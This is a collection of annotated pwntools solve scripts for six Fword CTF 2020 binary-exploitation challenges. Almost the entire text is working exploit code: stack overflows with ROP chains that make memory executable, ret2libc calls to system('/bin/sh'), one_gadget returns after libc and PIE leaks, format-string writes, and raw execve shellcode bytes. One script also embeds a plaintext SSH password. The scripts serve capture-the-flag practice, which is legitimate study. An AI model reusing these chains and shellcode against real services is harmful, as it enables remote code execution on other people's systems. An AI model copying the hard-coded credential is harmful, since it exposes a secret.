Fword CTF
"""Fword CTF 2020 -- 'blacklist' (amd64) solve script, Python 2-era pwntools.

What the script does, as written below:
  * Overflows a stack buffer with 0x40 bytes of filler plus one zero qword,
    then hands control to a ROP chain built from three pop-register gadgets.
  * The chain calls mprotect(bss_start, 10000, 7) so that range of .bss
    becomes readable/writable/executable, then read(0, bss, 0x400) to pull a
    second stage from stdin, and finally returns into `bss`.
  * The second stage is shellcraft-assembled code that opens '/home/fbi',
    opens a long fixed file name relative to it, and sendfile()s the result
    to stdout -- a file-read primitive rather than a shell (presumably
    because the challenge filters syscalls, as the name 'blacklist' hints;
    not verifiable from this script).
Every address is hard-coded, so this only works against that exact binary
(presumably non-PIE -- confirm with checksec). From a hardening point of
view the chain hinges on being able to turn a writable region executable at
runtime and on the absence of a stack protector in the vulnerable frame.
"""
from pwn import *
context.arch = 'amd64'          # needed so shellcraft/asm emit x86-64 code
# p = process('./blacklist')
p = remote('blacklist.fword.wtf', 1236)
e = ELF('./blacklist')          # loaded but not referenced further in this script
# Hard-coded addresses from the challenge binary (no symbol lookup is used).
mprotect = 0x448CF0
read = 0x447D30
bss_start = 0x4d2000            # page-aligned start handed to mprotect
bss = 0x4d2800                  # where the second stage is read to and jumped to
pop_rdi_ret = 0x4017b6
pop_rsi_ret = 0x4024f6
pop_rdx_ret = 0x401db2
pause()                         # wait for the operator (e.g. to attach a debugger) before sending
# Stage 1: filler up to the saved return address.
payload = 'a' * 0x40
payload += p64(0)               # presumably the saved rbp slot -- not verified here
# mprotect(bss_start, 10000, 7)   -- 7 == PROT_READ|PROT_WRITE|PROT_EXEC
payload += p64(pop_rdi_ret)
payload += p64(bss_start)
payload += p64(pop_rsi_ret)
payload += p64(10000)
payload += p64(pop_rdx_ret)
payload += p64(7)
payload += p64(mprotect)
# read(0, bss, 0x400)   -- the original comment said 100; the code passes 0x400
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(pop_rsi_ret)
payload += p64(bss)
payload += p64(pop_rdx_ret)
payload += p64(0x400)
payload += p64(read)
payload += p64(bss)             # read() returns into the freshly written second stage
payload += p64(0)               # trailing qword, presumably padding
# Stage 2: the code that ends up at `bss`. The string addresses below are
# bss + 0x200 and bss + 0x20a, which the ljust() further down guarantees.
shellcode = ''
shellcode += shellcraft.pushstr('')
shellcode += shellcraft.mov('rdi', 0x4d2a00)       # bss + 0x200 -> '/home/fbi'
shellcode += shellcraft.openat(0, 'rdi')           # dirfd 0 is ignored for an absolute path
shellcode += shellcraft.mov('rdi', 0x4d2a0a)       # bss + 0x20a -> the .txt name
shellcode += shellcraft.openat(3, 'rdi')           # dirfd 3: presumably the fd returned by the first openat
shellcode += shellcraft.sendfile(1, 4, 0, 1000)    # stdout <- fd 4 (presumably the .txt), offset NULL, up to 1000 bytes
shellcode_asm = asm(shellcode)
# Pad the code to exactly 0x200 bytes so the two strings land at bss+0x200
# and bss+0x20a ('/home/fbi\0' is 10 bytes), matching the addresses above.
shellcode_asm = shellcode_asm.ljust(0x200)
shellcode_asm += '/home/fbi\0' # 0x4d2a00
shellcode_asm += 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma.txt\0' # 0x4d2a0a
p.sendline(payload)             # stage 1; the newline terminates the line the program reads
p.send(shellcode_asm)           # stage 2, consumed by the read(0, bss, 0x400) call in the chain
p.interactive()
"""Fword CTF 2020 -- 'superez' solve script, Python 2-era pwntools.

Runs on the challenge host itself: connects over SSH, starts a bash,
launches ./task and answers its 'continue:' prompt with 0xa8 NUL bytes
followed by a single return address (0x400918; 0x400917 was the other
value tried, per the commented-out line). The local ELF('./superez_patched')
is loaded but not used for anything below.
NOTE(review): the SSH password is embedded in the script; a shared gist is
not the place for it -- read it from the environment (os.environ) instead.
"""
from pwn import *
s = ssh(user='ctf',host='superez.fword.wtf',port=2222,password='FwOrDAndKahl4FTW')
p = s.run("/bin/bash")          # remote shell; p is the tube to it
p.sendlineafter('$', './task')  # wait for the shell prompt, then start the target
e = ELF('./superez_patched')    # unused below
# p = process('./superez_patched', shell=True)
# e = ELF('./superez_patched')
payload = '\0' * (0xa8)         # 0xa8 NUL bytes of filler up to the saved return address
# payload += p64(0x400917)
payload += p64(0x400918)        # fixed address, so the binary is presumably non-PIE
p.sendlineafter('continue:', payload)
p.interactive()
"""Fword CTF 2020 -- 'molotov' (i386) solve script, Python 2-era pwntools.

Classic 32-bit ret2libc: the service prints system()'s address as a hex
string on its first line; the script derives the libc base from it using
the supplied libc6_2.30-0ubuntu2.2_i386.so, locates a '/bin/sh' string in
that libc, and overflows the stack so the saved return address becomes
system() with '/bin/sh' as its single argument. The chain relies entirely
on the printed address and on offsets from this exact libc build.
Uses Python 2 iterator syntax (.next()); on Python 3 that is next(...).
"""
from pwn import *
p = remote('54.210.217.206', 1240)
e = ELF('./molotov')            # loaded but not referenced below
libc = ELF('./libc6_2.30-0ubuntu2.2_i386.so')
system = int(p.recvline(), 16)  # first output line is system()'s address in hex
libc_base = system - libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh\0').next()   # first '/bin/sh' in this libc (Py2 .next())
info(hex(libc.search('/bin/sh\0').next()))
# Gadget addresses at fixed offsets in this libc build; they are only logged
# below and do not appear in the payload.
pr = libc_base + 0xd639e
pppr = libc_base + 0xd639c
info('system: ' + hex(system))
info('binsh: ' + hex(binsh))
info('libc_base: ' + hex(libc_base))
info('pr: ' + hex(pr))
info('pppr: ' + hex(pppr))
# 0x1c bytes of filler plus one zero dword reach the saved return address
# (the zero dword presumably lands on the saved ebp -- not verified here).
payload = 'a' * 0x1c
payload += p32(0)
payload += p32(system)          # overwritten return address -> system()
payload += p32(0)               # dummy return address for system() itself
payload += p32(binsh)           # first argument: pointer to '/bin/sh'
payload += p32(0)               # extra dwords, presumably padding
payload += p32(0)
payload += p32(0)
p.sendlineafter(':', payload)   # send once a prompt ending in ':' has been seen
p.interactive()
"""Fword CTF 2020 -- 'numbers' (amd64) solve script, Python 2-era pwntools.

Two rounds of the same pair of '??' prompts. Round one ('-1', then 8 bytes
of 'a') makes the service echo data containing a libc pointer: bytes 8..13
of the second received line are zero-extended to a qword and turned into
the libc base with a hard-coded offset (0x42480, specific to the remote
libc build). Round two sends '-1' again and then a 0x40-byte overflow whose
return address is a one_gadget in that libc (offset 328070; the other
candidates tried are listed inline). No offset here comes from a symbol
table, so everything is tied to that one libc build.
"""
from pwn import *
# p = process('./numbers')
p = remote('numbers.fword.wtf', 1237)
e = ELF('./numbers')            # loaded but not referenced below
p.sendafter('??', '-1')         # first prompt
p.sendafter('??', 'a' * 8 )     # second prompt: exactly 8 bytes, no newline
p.recvline()                    # discard the first response line
# Leaked pointer: 6 bytes at offset 8 of the next line, padded to 8 for u64.
libc_leak = u64(p.recvline()[8:8+6] + '\0\0')
libc_base = libc_leak - 0x42480 # hard-coded distance from the leaked pointer to the libc base
one_gadget = libc_base + 328070 # 328070 328163 1064784  <- one_gadget candidates for this libc
info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
info('one_gadget: ' + hex(one_gadget))
# Overflow: 0x40 bytes of filler, one qword (presumably the saved rbp), then
# the return address.
payload = 'a' * 0x40
payload += p64(0)
payload += p64(one_gadget)
pause()                         # wait for the operator before the second round
p.sendline()                    # sends a bare newline; its purpose is not visible here
p.sendafter('??', '-1')
p.sendafter('??', payload )     # the overflow goes into the second field
p.interactive()
"""Fword CTF 2020 -- 'one_piece_remake' (i386) solve script, Python 2-era pwntools.

Format-string write primitive: for each 4-byte chunk of a 26-byte
hand-written 32-bit shellcode (the escape bytes spell out '//bi' + 'n/sh'
and it ends in int 0x80), the script selects the 'gomugomunomi' menu entry
and sends a pwntools fmtstr_payload that writes the chunk to
0x804A038 + i, with the format string found at stack argument 7. Once the
whole blob is in place the 'run' entry is selected, which presumably hands
control to 0x804A038 (the script does not show how). The fixed address
means the binary is presumably non-PIE; the root cause being exploited is
user input reaching printf as the format string.
"""
from pwn import *
# p = process('./one_piece_remake')
p = remote('onepiece.fword.wtf', 1236)
e = ELF('./one_piece_remake')   # loaded but not referenced below
payload = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"
# Write the shellcode 4 bytes per iteration; the last chunk is 2 bytes (26 % 4).
# NOTE(review): the indentation of the two statements below was lost in the
# rendering; they are restored here as the loop body -- confirm against the
# original gist.
for i in range(0, len(payload), 4):
    p.sendlineafter('>>', 'gomugomunomi')
    p.sendafter('>>', fmtstr_payload(7, {0x804A038+i:payload[i:i+4]}))   # 7 = stack position of the format string
p.sendlineafter('>>', 'run')
p.interactive()
"""Fword CTF 2020 -- 'one_piece' (amd64, PIE) solve script, Python 2-era pwntools.

Three steps, all driven through the same '>>' menu:
  1. 'read' + a 40-byte input, then 'gomugomunomi', makes the service print
     a line whose hex value after ':' is taken as a code address 0xa3a past
     the PIE base.
  2. A 0x38-byte overflow with the chain pop rdi; puts@got; puts@plt;
     main_start leaks the resolved puts address and restarts main.
  3. libc base / system / one_gadget are computed from the supplied
     libc6_2.30-0ubuntu2.1_amd64.so, the menu sequence is repeated, and the
     final overflow returns straight into the one_gadget.
Several values (bss, read_got, read_plt, printf_got, ret, target, system)
are computed or logged but never used in either payload. All offsets are
tied to this binary/libc pair.
"""
from pwn import *
# p = process('./one_piece')
p = remote('onepiece.fword.wtf', 1238)
e = ELF('./one_piece')
libc = ELF('./libc6_2.30-0ubuntu2.1_amd64.so')
# libc = ELF('./libc-2.23.so')
# Step 1: PIE leak.
p.sendlineafter('>>', 'read')
p.sendafter(':', 'a' + 'z' * 38 + 'z')         # 40 bytes, no newline
p.sendlineafter('>>', 'gomugomunomi')
pie_leak = int(p.recvline().split(':')[1], 16) # hex value after the ':' in the printed line
pie_base = pie_leak - 0xa3a                    # hard-coded offset of the leaked address in the image
bss = pie_base + 0x202800                      # computed but unused below
read_got = pie_base + e.got['read']            # logged only
read_plt = pie_base + e.plt['read']            # unused below
printf_got = pie_base + e.got['printf']        # unused below
puts_got = pie_base + e.got['puts']
puts_plt = pie_base + e.plt['puts']
ret = pie_base + 0x70e                         # logged only
pop_rdi_ret = pie_base + 0xba3
main_start = pie_base + 0xA3F                  # where the first chain returns to for the second round
target = pie_base + 0x238                      # unused below
info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))
info('puts_got: ' + hex(puts_got))
info('read_got: ' + hex(read_got))
info('ret: ' + hex(ret))
info('pop_rdi_ret: ' + hex(pop_rdi_ret))
pause()                                        # wait for the operator before the overflow
# Step 2: libc leak. 0x30 bytes of filler plus one zero qword (presumably the
# saved rbp) reach the return address; then puts(puts@got) and back to main.
payload = 'z' * 0x30 + p64(0)
payload += p64(pop_rdi_ret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_start)
p.sendlineafter(':', payload)
p.recvline()                                   # discard one line before the leak
puts = u64(p.recvline()[:-1] + '\0\0')         # strip the newline, zero-extend to 8 bytes
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']    # logged only; the final payload uses one_gadget
# one_gadget_offset = 283158 # 283158 283242 983716 987463
one_gadget_offset = 1093545 # 945043 945046 945049 1093545  <- candidates for this libc build
one_gadget = libc_base + one_gadget_offset
info('puts: ' + hex(puts))
info('libc_base: ' + hex(libc_base))
info('system: ' + hex(system))
info('one_gadget: ' + hex(one_gadget))
# Step 3: same overflow layout, return address = one_gadget.
payload = 'z' * 0x30 + p64(0)
payload += p64(one_gadget)
p.sendlineafter('>>', 'read')                  # repeat the menu sequence after main restarted
p.sendafter(':', 'a' + 'z' * 38 + 'z')
p.sendlineafter('>>', 'gomugomunomi')
p.recvline()                                   # discard the second PIE-leak line
p.sendlineafter(':', payload)
p.interactive()